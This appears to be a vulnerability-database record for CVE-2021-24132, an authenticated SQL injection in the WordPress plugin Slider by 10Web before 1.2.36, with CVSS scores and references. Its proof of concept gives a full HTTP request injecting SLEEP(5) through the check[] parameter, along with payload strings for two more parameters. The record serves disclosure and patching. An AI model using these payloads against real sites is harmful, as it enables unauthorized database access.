Description
The bulk_action, export_full and save_slider_db functionalities of the plugin were vulnerable, allowing a high privileged user (Admin), or medium one such as Contributor+ (if "Role Options" is turn on for other users) to perform a SQL Injection attacks.
Related
{"id": "WPEX-ID:C1F45000-6C16-4606-BE80-1938A755AF2C", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Slider by 10Web < 1.2.36 - Multiple Authenticated SQL Injection", "description": "The bulk_action, export_full and save_slider_db functionalities of the plugin were vulnerable, allowing a high privileged user (Admin), or medium one such as Contributor+ (if \"Role Options\" is turn on for other users) to perform a SQL Injection attacks.\n", "published": "2020-09-29T00:00:00", "modified": "2021-01-21T06:02:45", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Nguyen Anh Tien", "references": ["https://plugins.trac.wordpress.org/changeset/2389754"], "cvelist": ["CVE-2021-24132"], "lastseen": "2021-02-15T22:22:23", "viewCount": 75, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24132"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:C1F45000-6C16-4606-BE80-1938A755AF2C"]}], "rev": 4}, "score": {"value": 6.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24132"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:C1F45000-6C16-4606-BE80-1938A755AF2C"]}]}, "exploitation": null, "vulnersScore": 6.1}, "sourceData": "Vulnerable param: `check[]`\r\nVulnerable function: WDW_S_Library::get\r\n\r\n```\r\nPOST /wp-admin/admin.php?page=sliders_wds HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 201\r\n\r\ns=&bulk_action=duplicate&check%5BSLEEP(5)%5D=on&select_slider_merge=-select-&imagesexport=on&nonce_wd=e7f3386825&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dsliders_wds&task=duplicate¤t_id=\r\n```\r\n\r\nOther SQLi:\r\n\r\n- File: admin/models/WDSModelWDSExport.php\r\n- Function: export_full\r\n- Params: slider_ids_string\r\n- PoC: Insert one slider with id = 1 and set $slider_ids_string to string: 1) AND SLEEP(5\r\n\r\n- File: admin/controllers/Sliders.php\r\n- Function: save_slider_db\r\n- Params: del_slide_ids_string\r\n- PoC: Insert one slider with id = 1 and set $del_slide_ids_string to string: 1) AND SLEEP(5", "generation": 1, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646177195}}
{"wpvulndb": [{"lastseen": "2021-02-15T22:22:23", "bulletinFamily": "software", "cvelist": ["CVE-2021-24132"], "description": "The bulk_action, export_full and save_slider_db functionalities of the plugin were vulnerable, allowing a high privileged user (Admin), or medium one such as Contributor+ (if \"Role Options\" is turn on for other users) to perform a SQL Injection attacks.\n\n### PoC\n\nVulnerable param: `check[]` Vulnerable function: WDW_S_Library::get ``` POST /wp-admin/admin.php?page=sliders_wds HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 201 s=&bulk;_action=duplicate&check;%5BSLEEP(5)%5D=on&select;_slider_merge=-select-&imagesexport;=on&nonce;_wd=e7f3386825&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dsliders_wds&task;=duplicate&current;_id= ``` Other SQLi: \\- File: admin/models/WDSModelWDSExport.php \\- Function: export_full \\- Params: slider_ids_string \\- PoC: Insert one slider with id = 1 and set $slider_ids_string to string: 1) AND SLEEP(5 \\- File: admin/controllers/Sliders.php \\- Function: save_slider_db \\- Params: del_slide_ids_string \\- PoC: Insert one slider with id = 1 and set $del_slide_ids_string to string: 1) AND SLEEP(5\n", "modified": "2021-01-21T06:02:45", "published": "2020-09-29T00:00:00", "id": "WPVDB-ID:C1F45000-6C16-4606-BE80-1938A755AF2C", "href": "https://wpscan.com/vulnerability/c1f45000-6c16-4606-be80-1938a755af2c", "type": "wpvulndb", "title": "Slider by 10Web < 1.2.36 - Multiple Authenticated SQL Injection", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T14:47:25", "description": "The Slider by 10Web WordPress plugin, versions before 1.2.36, in the bulk_action, export_full and save_slider_db functionalities of the plugin were vulnerable, allowing a high privileged user (Admin), or medium one such as Contributor+ (if \"Role Options\" is turn on for other users) to perform a SQL Injection attacks.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-18T15:15:00", "type": "cve", "title": "CVE-2021-24132", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24132"], "modified": "2021-03-24T17:10:00", "cpe": [], "id": "CVE-2021-24132", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24132", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}]}